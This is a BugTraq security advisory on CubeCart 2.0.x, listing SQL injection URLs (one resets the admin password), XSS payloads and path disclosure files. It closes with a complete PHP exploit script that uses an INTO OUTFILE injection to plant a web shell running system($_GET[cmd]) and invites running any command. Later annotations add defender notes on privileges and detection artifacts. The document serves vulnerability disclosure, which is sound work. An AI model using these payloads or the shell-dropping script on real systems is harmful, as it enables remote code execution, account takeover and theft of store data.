BugTraq
CubeCart Multiple input Validation vulnerabilities Sep 26 2006 03:53AM
security soqor net
Hello,

CubeCart Multiple input Validation vulnerabilities

Discovered By : HACKERS PAL

Copyright : HACKERS PAL

Website : http://www.soqor.net

Email Address : security (at) soqor (dot) net [email concealed]

SQL injection

admin/forgot_pass.php?submit=1&user_name=-1'or%201=1/*

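This resets the administrator's password: the user_name value evidently reaches the SQL query unescaped, so the injected condition matches regardless of the name supplied.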

--

admin/forgot_pass.php?submit=1&user_name=-1'%20union%20select%201,2,3,4,
5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30
,31,32,33,34,35,36,37,38,39,40,41,42/*

--

view_order.php?order_id='%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12,
13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30/*

--

view_doc.php?view_doc=-1'%20union%20select%201,2/*

--

admin/print_order.php?order_id='%20union%20select%201,2,3,4,5,6,7,8,9,10
,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30/*

/***************************************/

XSS (cross-site scripting)

admin/print_order.php?order_id=<script>alert(document.cookie);</script>

--

view_order.php?order_id=<script>alert(document.cookie);</script>

--

admin/nav.php?site_url="><script>alert(document.cookie);</script><noscri
pt>

admin/nav.php?la_search_home=<script>alert(document.cookie);</script>

The language variables used by this file are affected as well.

--

admin/image.php?image=<script>alert(document.cookie);</script>

--

admin/header.inc.php?site_name=</title><script>alert(document.cookie);</
script>

admin/header.inc.php?la_adm_header=</title><script>alert(document.cookie
);</script>

admin/header.inc.php?charset='><script>alert(document.cookie);</script>

and all other variables in this file

--

footer.inc.php?la_pow_by=<script>alert(document.cookie);</script>

--

header.inc.php?site_name=</title><script>alert(document.cookie);</script
>

and all other variables in the file.

--

/***************************************/

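Full path disclosure (requesting these files directly returns a PHP error message that reveals the installation path)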

information.php

language.php

link_navi.php?cat_id=1

list_docs.php

popular_prod.php

sale.php

check_sum.php

spotlight.php

cat_navi.php

/***************************************/

Exploit :-

#!/usr/bin/php -q -d short_open_tag=on

<?

/*

/* CubeCart Remote sql injection exploit

/* By : HACKERS PAL

/* WwW.SoQoR.NeT

/*

/* Tested on CubeCart 2.0.X and maybe other versions are injected

*/

// Print the banner. Everything between the quotes is a string literal that
// merely looks like comment lines.
print_r('

/**********************************************/

/* CubeCart Remote sql injection exploit */

/* by HACKERS PAL <security (at) soqor (dot) net [email concealed]> */

/* site: http://www.soqor.net */');

// Without a host argument, print the usage text and stop.
if ($argc<2) {

print_r('

/* -- */

/* Usage: php '.$argv[0].' host

/* Example: */

/* php '.$argv[0].' http://localhost/CubeCart/

/**********************************************/

');

die;

}

// Turn off all PHP error reporting for the rest of the run.
error_reporting(0);

// 0 removes the script execution time limit.
ini_set("max_execution_time",0);

// Socket-based stream reads (the HTTP fetches below) time out after 5 seconds.
ini_set("default_socket_timeout",5);

// Base URL of the CubeCart installation, taken from the first CLI argument.
$url=$argv[1];

// cat_navi.php is one of the files the advisory lists under "Full path"; it is
// requested first so the server-side install path can be read from the response.
// Defender note: presumably the path comes from a PHP error message, so running
// production with display_errors off would keep it out of the response - confirm
// against the affected version.
$exploit1="/cat_navi.php";

/**
 * Fetch whatever $url points at and return it as a string.
 *
 * file_get_contents() is used when the runtime provides it; otherwise the
 * resource is opened with fopen() and read in 1024-byte chunks.
 *
 * NOTE: in the fallback path the fopen() result is not checked and $contents
 * is never initialised before being appended to, so a failed or empty read
 * returns an undefined variable (null).
 *
 * @param string $url Location to read (a URL or a local path).
 * @return string|false|null The content; false when file_get_contents() fails.
 */
function get_page($url)
{
    // Preferred path: let PHP read the whole resource in one call.
    if (function_exists("file_get_contents")) {
        return file_get_contents($url);
    }

    // Fallback: manual chunked read until fread() returns an empty/false value.
    $handle = fopen("$url", "r");
    while ($chunk = fread($handle, 1024)) {
        $contents = $contents . $chunk;
    }

    return $contents;
}

// Step 1: request cat_navi.php and pull the script's filesystem path out of the
// response. explode("<b>") followed by index 2 selects the text after the second
// <b> tag, cut at its closing </b> (presumably the file path inside a PHP
// warning - the response body is not shown on this page).
$page = get_page($url.$exploit1);

$pa=explode("<b>",$page);

$pa=explode("</b>",$pa[2]);

// Swap the script name for soqor.php: a new file name in the same directory.
$path = str_replace("cat_navi.php","",$pa[0])."soqor.php";

// '\ ' minus the space leaves a single backslash; backslashes in the path are
// then converted to forward slashes (covers Windows-style paths).
$var='\ ';

$var = str_replace(" ","",$var);

$path = str_replace($var,"/",$path);

// Step 2: the view_doc parameter of view_doc.php is injected with a UNION SELECT
// ... INTO OUTFILE, so that MySQL itself writes a PHP file to $path; that file
// hands the cmd query parameter to system().
// Defender notes: this step depends on the application's MySQL account holding
// the FILE privilege and on mysqld being able to write inside the web root.
// Revoking FILE (and restricting secure_file_priv) blocks the file write; the
// underlying fix is to bind view_doc as a query parameter or cast it to an
// integer (presumably it is a numeric document id - confirm in view_doc.php).
$exploit2="/view_doc.php?view_doc=-1'%20union%20select%20'<?php%20system
(".'$_GET[cmd]'.");%20?>','WwW.SoQoR.NeT'%20INTO%20OUTFILE%20'$path'%20f
rom%20store_docs/*";

$page_now = get_page($url.$exploit2);

// Success is inferred from the text "mysql_fetch_array" showing up in the
// response (presumably a PHP warning printed by view_doc.php).
// Detection: "union select" and "INTO OUTFILE" in request URLs for view_doc.php,
// and an unexpected soqor.php in the web root, are the artifacts this run leaves.
if(ereg("mysql_fetch_array()",$page_now))

{

$newurl=$url."/soqor.php?cmd=id";

// Report the URL of the written file.
Echo "\n[+] Go TO ".str_replace("//","/",$newurl)."\n[+] Change id to any command you want :)";

}

else

{

Echo "\n[-] Exploit Faild";

}

// Print the closing banner and exit.
Die("\n/* Visit us : WwW.SoQoR.NeT */\n/**********************************************/");

?>

#WwW.SoQoR.NeT
